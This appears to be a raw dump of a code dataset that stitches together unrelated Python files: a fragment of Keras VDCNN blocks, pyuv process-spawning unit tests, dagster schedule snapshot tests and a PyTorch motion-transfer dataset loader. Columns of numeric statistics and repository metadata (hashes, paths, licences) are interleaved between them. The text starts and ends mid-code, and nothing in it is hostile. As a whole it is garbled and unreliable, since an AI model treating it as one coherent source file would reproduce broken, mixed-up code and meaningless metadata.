kernel_reg_l2, bias_reg_l2, batch_norm_first):
def f(x):
x = MaxPooling1D(pool_size=3, strides=2)(x)
main = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first)(x)
main = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first)(main)
x = add([main, x])
return x
return f
def vdcnn_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first, last_block):
def f(x):
main = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first)(x)
x = add([main, x])
main = convolutional_block(filter_nr, kernel_size, use_batch_norm, use_prelu, dropout, dropout_mode,
kernel_reg_l2, bias_reg_l2, batch_norm_first)(x)
x = add([main, x])
if not last_block:
x = MaxPooling1D(pool_size=3, strides=2)(x)
return x
return f
| 47.285036
| 119
| 0.608228
| 2,305
| 19,907
| 4.817787
| 0.070282
| 0.050878
| 0.042143
| 0.039172
| 0.868348
| 0.85493
| 0.828456
| 0.80027
| 0.779018
| 0.770914
| 0
| 0.011491
| 0.326769
| 19,907
| 420
| 120
| 47.397619
| 0.817117
| 0.017833
| 0
| 0.729412
| 0
| 0
| 0.005795
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079412
| false
| 0
| 0.017647
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
beca0766badad6c80c45f258af8d7476467f1664
| 11,206
|
py
|
Python
|
tests/test_process.py
|
benoitc/pyuv
|
51a2f8687e3b6cd54af5ce81aabfc00b7fe40a18
|
[
"MIT"
] | 1
|
2020-01-21T11:10:38.000Z
|
2020-01-21T11:10:38.000Z
|
tests/test_process.py
|
benoitc/pyuv
|
51a2f8687e3b6cd54af5ce81aabfc00b7fe40a18
|
[
"MIT"
] | null | null | null |
tests/test_process.py
|
benoitc/pyuv
|
51a2f8687e3b6cd54af5ce81aabfc00b7fe40a18
|
[
"MIT"
] | null | null | null |
import os
try:
import pwd
except ImportError:
pwd = None
import sys
from common import platform_skip, unittest2
import common
import pyuv
class ProcessTest(unittest2.TestCase):
def test_process_basic(self):
self.exit_cb_called = 0
self.close_cb_called = 0
def proc_close_cb(proc):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(proc_close_cb)
loop = pyuv.Loop.default_loop()
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_basic.py"], exit_callback=proc_exit_cb)
else:
proc.spawn(file="./proc_basic.py", exit_callback=proc_exit_cb)
pid = proc.pid
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 1)
self.assertNotEqual(pid, None)
def test_process_cwd(self):
self.exit_cb_called = 0
self.close_cb_called = 0
def proc_close_cb(proc):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(proc_close_cb)
loop = pyuv.Loop.default_loop()
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_basic.py"], exit_callback=proc_exit_cb, cwd=".")
else:
proc.spawn(file="./proc_basic.py", exit_callback=proc_exit_cb, cwd=".")
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 1)
def test_process_stdout(self):
self.exit_cb_called = 0
self.close_cb_called = 0
self.received_output = None
def handle_close_cb(handle):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(handle_close_cb)
def stdout_read_cb(handle, data, error):
if data is not None:
self.received_output = data.strip()
handle.close(handle_close_cb)
loop = pyuv.Loop.default_loop()
stdout_pipe = pyuv.Pipe(loop)
stdio = []
stdio.append(pyuv.StdIO(flags=pyuv.UV_IGNORE))
stdio.append(pyuv.StdIO(stream=stdout_pipe, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_WRITABLE_PIPE))
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_stdout.py"], exit_callback=proc_exit_cb, stdio=stdio)
else:
proc.spawn(file="./proc_stdout.py", exit_callback=proc_exit_cb, stdio=stdio)
stdout_pipe.start_read(stdout_read_cb)
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 2)
self.assertEqual(self.received_output, b"TEST")
def test_process_args(self):
self.exit_cb_called = 0
self.close_cb_called = 0
self.received_output = None
def handle_close_cb(handle):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(handle_close_cb)
def stdout_read_cb(handle, data, error):
self.received_output = data.strip()
handle.close(handle_close_cb)
loop = pyuv.Loop.default_loop()
stdout_pipe = pyuv.Pipe(loop)
stdio = []
stdio.append(pyuv.StdIO(flags=pyuv.UV_IGNORE))
stdio.append(pyuv.StdIO(stream=stdout_pipe, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_WRITABLE_PIPE))
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_args_stdout.py", b"TEST"], exit_callback=proc_exit_cb, stdio=stdio)
else:
proc.spawn(file="./proc_args_stdout.py", args=["TEST"], exit_callback=proc_exit_cb, stdio=stdio)
stdout_pipe.start_read(stdout_read_cb)
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 2)
self.assertEqual(self.received_output, b"TEST")
def test_process_env(self):
self.exit_cb_called = 0
self.close_cb_called = 0
self.received_output = None
def handle_close_cb(handle):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(handle_close_cb)
def stdout_read_cb(handle, data, error):
self.received_output = data.strip()
handle.close(handle_close_cb)
loop = pyuv.Loop.default_loop()
stdout_pipe = pyuv.Pipe(loop)
stdio = []
stdio.append(pyuv.StdIO(flags=pyuv.UV_IGNORE))
stdio.append(pyuv.StdIO(stream=stdout_pipe, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_WRITABLE_PIPE))
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_env_stdout.py"], env={"TEST": "TEST"}, exit_callback=proc_exit_cb, stdio=stdio)
else:
proc.spawn(file="./proc_env_stdout.py", env={"TEST": "TEST"}, exit_callback=proc_exit_cb, stdio=stdio)
stdout_pipe.start_read(stdout_read_cb)
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 2)
self.assertEqual(self.received_output, b"TEST")
def test_process_stdin(self):
self.exit_cb_called = 0
self.close_cb_called = 0
self.received_output = None
self.exit_status = -1
self.term_signal = 0
def handle_close_cb(handle):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.exit_cb_called += 1
self.exit_status = exit_status
self.term_signal = term_signal
proc.close(handle_close_cb)
def stdout_read_cb(handle, data, error):
if data:
self.received_output = data.strip()
handle.close(handle_close_cb)
def stdin_write_cb(handle, error):
handle.close(handle_close_cb)
loop = pyuv.Loop.default_loop()
stdin_pipe = pyuv.Pipe(loop)
stdout_pipe = pyuv.Pipe(loop)
stdio = []
stdio.append(pyuv.StdIO(stream=stdin_pipe, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_READABLE_PIPE))
stdio.append(pyuv.StdIO(stream=stdout_pipe, flags=pyuv.UV_CREATE_PIPE|pyuv.UV_WRITABLE_PIPE))
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_stdin_stdout.py"], exit_callback=proc_exit_cb, stdio=stdio)
else:
proc.spawn(file="./proc_stdin_stdout.py", exit_callback=proc_exit_cb, stdio=stdio)
stdout_pipe.start_read(stdout_read_cb)
stdin_pipe.write(b"TEST"+common.linesep, stdin_write_cb)
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 3)
self.assertEqual(self.received_output, b"TEST")
def test_process_kill(self):
self.exit_cb_called = 0
self.close_cb_called = 0
self.exit_status = -1
self.term_signal = 0
def handle_close_cb(proc):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.exit_cb_called += 1
self.exit_status = exit_status
self.term_signal = term_signal
proc.close(handle_close_cb)
def timer_cb(timer):
timer.close(handle_close_cb)
proc.kill(15)
loop = pyuv.Loop.default_loop()
timer = pyuv.Timer(loop)
timer.start(timer_cb, 0.1, 0)
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_infinite.py"], exit_callback=proc_exit_cb)
else:
proc.spawn(file="./proc_infinite.py", exit_callback=proc_exit_cb)
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 2)
if sys.platform == 'win32':
self.assertEqual(self.exit_status, 1)
else:
self.assertEqual(self.exit_status, 0)
self.assertEqual(self.term_signal, 15)
@platform_skip(["win32"])
def test_process_uid_gid(self):
self.exit_cb_called = 0
self.close_cb_called = 0
def proc_close_cb(proc):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(proc_close_cb)
if os.getuid() != 0:
self.skipTest("test disabled if running as non-root")
return
p_info = pwd.getpwnam("nobody")
loop = pyuv.Loop.default_loop()
proc = pyuv.Process(loop)
proc.spawn(file="./proc_basic.py", exit_callback=proc_exit_cb, uid=p_info.pw_uid, gid=p_info.pw_gid, flags=pyuv.UV_PROCESS_SETUID|pyuv.UV_PROCESS_SETGID)
pid = proc.pid
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 1)
self.assertNotEqual(pid, None)
@platform_skip(["win32"])
def test_process_uid_fail(self):
self.exit_cb_called = 0
self.close_cb_called = 0
def proc_close_cb(proc):
self.close_cb_called +=1
def proc_exit_cb(proc, exit_status, term_signal):
self.assertNotEqual(exit_status, 0)
self.exit_cb_called += 1
proc.close(proc_close_cb)
if os.getuid() != 0:
self.skipTest("test disabled if running as non-root")
return
loop = pyuv.Loop.default_loop()
proc = pyuv.Process(loop)
proc.spawn(file="./proc_basic.py", exit_callback=proc_exit_cb, uid=-42424242, flags=pyuv.UV_PROCESS_SETUID)
loop.run()
self.assertEqual(self.exit_cb_called, 1)
self.assertEqual(self.close_cb_called, 1)
def test_process_detached(self):
self.exit_cb_called = 0
def proc_exit_cb(proc, exit_status, term_signal):
self.exit_cb_called += 1
loop = pyuv.Loop.default_loop()
proc = pyuv.Process(loop)
if sys.platform == 'win32':
proc.spawn(file="cmd.exe", args=["/c", "proc_basic.py"], exit_callback=proc_exit_cb, flags=pyuv.UV_PROCESS_DETACHED)
else:
proc.spawn(file="./proc_basic.py", exit_callback=proc_exit_cb, flags=pyuv.UV_PROCESS_DETACHED)
proc.unref()
pid = proc.pid
loop.run()
self.assertEqual(self.exit_cb_called, 0)
proc.kill(0)
proc.kill(15)
self.assertNotEqual(pid, None)
if __name__ == '__main__':
unittest2.main(verbosity=2)
| 40.309353
| 161
| 0.627075
| 1,523
| 11,206
| 4.327643
| 0.069599
| 0.052799
| 0.043696
| 0.072827
| 0.898953
| 0.877864
| 0.874678
| 0.86436
| 0.853892
| 0.852981
| 0
| 0.014008
| 0.261021
| 11,206
| 277
| 162
| 40.454874
| 0.78191
| 0
| 0
| 0.769231
| 0
| 0
| 0.049714
| 0.003838
| 0
| 0
| 0
| 0
| 0.138462
| 1
| 0.134615
| false
| 0
| 0.026923
| 0
| 0.173077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bedda59ce9a7e5ef6a625b4b2e7b1ced216b91b7
| 6,705
|
py
|
Python
|
python_modules/dagster-graphql/dagster_graphql_tests/graphql/snapshots/snap_test_execute_schedule.py
|
joeyfreund/dagster
|
e551ff4bbb2c42b497a3e1c28cfb51fd5f2b1c21
|
[
"Apache-2.0"
] | 1
|
2020-12-20T18:39:17.000Z
|
2020-12-20T18:39:17.000Z
|
python_modules/dagster-graphql/dagster_graphql_tests/graphql/snapshots/snap_test_execute_schedule.py
|
joeyfreund/dagster
|
e551ff4bbb2c42b497a3e1c28cfb51fd5f2b1c21
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster-graphql/dagster_graphql_tests/graphql/snapshots/snap_test_execute_schedule.py
|
joeyfreund/dagster
|
e551ff4bbb2c42b497a3e1c28cfb51fd5f2b1c21
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots[
'TestExecuteSchedule.test_tick_skip[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = {
'stats': {'ticksFailed': 0, 'ticksSkipped': 1, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [{'status': 'SKIPPED', 'tickId': '1'}],
'ticksCount': 1,
}
snapshots[
'TestExecuteSchedule.test_tick_success[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 1},
'ticks': [{'status': 'SUCCESS', 'tickId': '1'}],
'ticksCount': 1,
}
snapshots[
'TestExecuteSchedule.test_should_execute_scheduler_error[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = {
'stats': {'ticksFailed': 1, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [{'status': 'FAILURE', 'tickId': '1'}],
'ticksCount': 1,
}
snapshots[
'TestExecuteSchedule.test_tags_scheduler_error[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 1},
'ticks': [{'status': 'SUCCESS', 'tickId': '1'}],
'ticksCount': 1,
}
snapshots[
'TestExecuteSchedule.test_run_config_scheduler_error[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 1},
'ticks': [{'status': 'SUCCESS', 'tickId': '1'}],
'ticksCount': 1,
}
snapshots[
'TestExecuteSchedule.test_query_multiple_schedule_ticks[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = [
{
'name': 'dynamic_config',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'run_config_error_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 1},
'ticks': [{'status': 'SUCCESS', 'tickId': '3'}],
'ticksCount': 1,
},
},
{
'name': 'invalid_config_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'no_config_pipeline_hourly_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 1},
'ticks': [{'status': 'SUCCESS', 'tickId': '1'}],
'ticksCount': 1,
},
},
{
'name': 'no_config_pipeline_hourly_schedule_with_config_fn',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'no_config_should_execute',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 1, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [{'status': 'SKIPPED', 'tickId': '2'}],
'ticksCount': 1,
},
},
{
'name': 'partition_based',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'partition_based_custom_selector',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'partition_based_decorator',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'partition_based_multi_mode_decorator',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'should_execute_error_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'solid_selection_daily_decorator',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'solid_selection_hourly_decorator',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'solid_selection_monthly_decorator',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'solid_selection_weekly_decorator',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'tagged_pipeline_override_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'tagged_pipeline_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
{
'name': 'tags_error_schedule',
'scheduleState': {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 0},
'ticks': [],
'ticksCount': 0,
},
},
]
snapshots[
'TestExecuteSchedule.test_invalid_config_schedule_error[sqlite_with_cli_api_run_launcher_in_process_env] 1'
] = {
'stats': {'ticksFailed': 0, 'ticksSkipped': 0, 'ticksStarted': 0, 'ticksSucceeded': 1},
'ticks': [{'status': 'SUCCESS', 'tickId': '1'}],
'ticksCount': 1,
}
| 32.707317
| 112
| 0.539299
| 564
| 6,705
| 6.170213
| 0.134752
| 0.110345
| 0.186207
| 0.191667
| 0.866667
| 0.862931
| 0.847414
| 0.807184
| 0.807184
| 0.807184
| 0
| 0.028737
| 0.278598
| 6,705
| 204
| 113
| 32.867647
| 0.690717
| 0.009247
| 0
| 0.507772
| 0
| 0
| 0.502711
| 0.170783
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010363
| 0
| 0.010363
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8301a0d7c9d84d6f27427167df5c53b5615fe1f8
| 21,105
|
py
|
Python
|
DataSet.py
|
jlimsf/FewShotMotionTransfer
|
54fcef9d2c22d27bfea81a239b56d1a040205e86
|
[
"Apache-2.0"
] | null | null | null |
DataSet.py
|
jlimsf/FewShotMotionTransfer
|
54fcef9d2c22d27bfea81a239b56d1a040205e86
|
[
"Apache-2.0"
] | null | null | null |
DataSet.py
|
jlimsf/FewShotMotionTransfer
|
54fcef9d2c22d27bfea81a239b56d1a040205e86
|
[
"Apache-2.0"
] | null | null | null |
from torch.utils.data import dataset
import os
from PIL import Image
from torchvision.transforms import transforms
import torch
from torchvision.transforms import functional as F
import numpy as np
import glob
import random
import imageio
class BaseDataSet(dataset.Dataset):
def __init__(self, config):
super(BaseDataSet, self).__init__()
self.config = config
def loader(self, path, mode):
# with open(path, 'rb') as f:
img = Image.open(path)
return img.convert(mode)
def GetTexture(self, im, IUV):
U = IUV[:, :, 1]
V = IUV[:, :, 2]
Texture = np.zeros((24, 128, 128, 3), dtype=np.uint8)
for PartInd in range(1, 25):
tex = Texture[PartInd - 1, :, :, :].squeeze()
x, y = np.where(IUV[:, :, 0] == PartInd)
u = U[x, y] // 2
v = V[x, y] // 2
tex[u, v] = im[x, y]
Texture[PartInd - 1] = tex
TextureIm = np.zeros((128 * 4, 128 * 6, 3), dtype=np.uint8)
for i in range(len(Texture)):
x = i // 6 * 128
y = i % 6 * 128
TextureIm[x:x + 128, y:y + 128] = Texture[i]
return TextureIm
def label_to_tensor(self, label):
if isinstance(label, np.ndarray):
return torch.from_numpy(label)
else:
return (F.to_tensor(label)*255.0).type(torch.long)
def _transform(self, images, tolabel):
if 'resize' in self.config:
old_size, _ = images[0].size
size = [self.config['resize'], self.config['resize']]
resize = transforms.Resize(size, Image.NEAREST)
for i in range(len(images)):
images[i] = resize(images[i])
if 'hflip' in self.config and self.config['hflip']:
flip = random.randint(0, 1)
else:
flip = 0
if flip==1:
for i in range(len(images)):
images[i] = F.hflip(images[i])
for i in range(len(images)):
if tolabel[i]:
images[i] = self.label_to_tensor(images[i])
else:
images[i] = F.to_tensor(images[i])
return images
class ReconstructDataSet(BaseDataSet):
def __init__(self, root, config, list_name="image_list.txt"):
super(ReconstructDataSet, self).__init__(config)
self.root = root
self.folders = glob.glob(os.path.join(root, "*"))
self.folders.sort()
self.filelist = []
self.filelists = []
for i, folder in enumerate(self.folders):
with open(os.path.join(folder, list_name)) as f:
filelist = f.readlines()
filelist.sort(key=int)
filelist = [(x.strip(), i) for x in filelist]
self.filelist += filelist
self.filelists.append(filelist)
self.size = self.config['resize']
self.stage = self.config['phase']
def __len__(self):
return len(self.filelist)
def __getitem__(self, index):
label = self.filelist[index][1]
name = self.filelist[index][0]
folder = self.folders[label]
if self.stage == 'pretrain' or self.stage == 'train':
image = self.loader(os.path.join(folder, "image", name+".png"), mode="RGB")
body = self.loader(os.path.join(folder, "body", name+".png"), mode="L")
foreground = self.loader(os.path.join(folder, "segmentation", name+".png"), mode="L")
image_index = random.randrange(0, len(self.filelists[label]))
image_name = self.filelists[label][image_index][0]
class_image = self.loader(os.path.join(folder, "image", image_name+".png"), mode="RGB")
class_foreground = self.loader(os.path.join(folder, "segmentation", image_name+".png"), mode="L")
class_body = self.loader(os.path.join(folder, "body", image_name+".png"), mode="L")
IUV = self.loader(os.path.join(folder, "densepose", name+".png"), mode="RGB")
# transform_iuv = self._transform([IUV], [True] )[0]
# print (np.asarray(IUV).shape)
transform_output = self._transform([image, class_image, body, class_body, foreground, class_foreground, IUV],
[False, False, True, True, True, True, True])
data_name = ["image", "class_image", "body", "class_body", "foreground", "class_foreground", "IUV"]
data=dict(zip(data_name, transform_output))
# print (np.asarray(data["IUV"]).shape)
# print (self.stage)
data["mask"] = data["IUV"][-1,:,:]
data["foreground"] = (data["foreground"] > 0).to(torch.long)
data["U"] = data["IUV"][1,:,:].unsqueeze(0).to(torch.float32)/self.config["URange"]
data["V"] = data["IUV"][0,:,:].unsqueeze(0).to(torch.float32)/self.config["VRange"]
data.pop("IUV")
if self.stage == 'pretrain_texture':
data = {}
textures = []
texture = self.loader(os.path.join(folder, "texture", name + ".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1] // 4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor
texture_tensor = texture_tensor.contiguous().view(24 * 3, texture_size, texture_size)
textures.append(texture_tensor)
indexes = random.sample(list(range(0, len(self.filelists[label]))), self.config["num_texture"]-1)
for i in indexes:
name = self.filelists[label][i][0]
texture = self.loader(os.path.join(folder, "texture", name+".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1]//4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor.contiguous().view(24*3, texture_size, texture_size)
textures.append(texture_tensor)
data["texture"] = torch.stack(textures, dim=0)
if self.stage == 'train':
indexes = random.sample(list(range(0, len(self.filelists[label]))), 1)
for i in indexes:
name = self.filelists[label][i][0]
texture = self.loader(os.path.join(folder, "texture", name+".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1]//4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor.contiguous().view(24*3, texture_size, texture_size)
data["texture"] = texture_tensor.unsqueeze(0)
data["class"] = label
return data
class TransferDataSet(BaseDataSet):
def __init__(self, root, src_root, config, list_name="image_list.txt"):
super(TransferDataSet, self).__init__(config)
self.root = root
with open(os.path.join(root, list_name)) as f:
filelist = f.readlines()
filelist.sort(key=int)
filelist = [x.strip() for x in filelist]
self.filelist = filelist
self.src_root = src_root
with open(os.path.join(src_root, list_name)) as f:
filelist = f.readlines()
filelist.sort(key=int)
filelist = [x.strip() for x in filelist]
self.src_filelist = filelist
self.size = self.config['resize']
self.stage = self.config['phase']
def __len__(self):
return len(self.filelist)
def loader(self, path, mode):
with open(path, 'rb') as f:
img = Image.open(f)
return img.convert(mode)
def label_to_tensor(self, label):
if isinstance(label, np.ndarray):
return torch.from_numpy(label)
else:
return (F.to_tensor(label) * 255.0).type(torch.long)
def _transform(self, images, tolabel):
if 'resize' in self.config:
old_size, _ = images[0].size
size = [self.config['resize'], self.config['resize']]
resize = transforms.Resize(size, Image.NEAREST)
for i in range(len(images)):
images[i] = resize(images[i])
if 'hflip' in self.config and self.config['hflip']:
flip = random.randint(0, 1)
else:
flip = 0
if flip == 1:
for i in range(len(images)):
images[i] = F.hflip(images[i])
for i in range(len(images)):
if tolabel[i]:
images[i] = self.label_to_tensor(images[i])
else:
images[i] = F.to_tensor(images[i])
return images
def __getitem__(self, index):
name = self.filelist[index]
root = self.root
src_root = self.src_root
image = self.loader(os.path.join(root, "image", name + ".png"), mode="RGB")
body = self.loader(os.path.join(root, "body", name + ".png"), mode="L")
foreground = self.loader(os.path.join(root, "segmentation", name + ".png"), mode="L")
class_image = self.loader(os.path.join(src_root, "image", self.src_filelist[0] + ".png"), mode="RGB")
class_foreground = self.loader(os.path.join(src_root, "segmentation", self.src_filelist[0] + ".png"), mode="L")
class_body = self.loader(os.path.join(src_root, "body", self.src_filelist[0] + ".png"), mode="L")
transform_output = self._transform([image, class_image, body, class_body, foreground, class_foreground], [False, False, True, True, True, True])
data_name = ["image", "class_image", "body", "class_body", "foreground", "class_foreground"]
data = dict(zip(data_name, transform_output))
data["foreground"] = (data["foreground"] > 0).to(torch.long)
textures = []
indexes = random.sample(list(range(0, len(self.src_filelist))), self.config["num_texture"])
for i in indexes:
name = self.src_filelist[i]
texture = self.loader(os.path.join(src_root, "texture", name + ".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1] // 4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor
texture_tensor = texture_tensor.contiguous().view(24 * 3, texture_size, texture_size)
textures.append(texture_tensor)
data["texture"] = torch.stack(textures, dim=0)
data["class"] = 0
return data
class RT_ReconstructDataSet(BaseDataSet):
def __init__(self, root, config, min_sequence_len, list_name="image_list.txt"):
super(RT_ReconstructDataSet, self).__init__(config)
self.root = root
# self.folders = glob.glob(os.path.join(root, "*"))
self.folders = []
for video in os.listdir(self.root):
video_dir = os.path.join(self.root, video)
for subject in os.listdir(video_dir):
subject_dir = os.path.join(video_dir, subject)
with open(os.path.join(subject_dir, list_name)) as f:
filelist = f.readlines()
if len(filelist) < min_sequence_len:
continue
else:
self.folders.append(subject_dir)
self.filelist = []
self.filelists = []
for i, folder in enumerate(self.folders):
with open(os.path.join(folder, list_name)) as f:
filelist = f.readlines()
# filelist.sort(key=int)
filelist = [(x.strip(), i) for x in filelist]
self.filelist += filelist
self.filelists.append(filelist)
self.size = self.config['resize']
self.stage = self.config['phase']
def __len__(self):
return len(self.filelist)
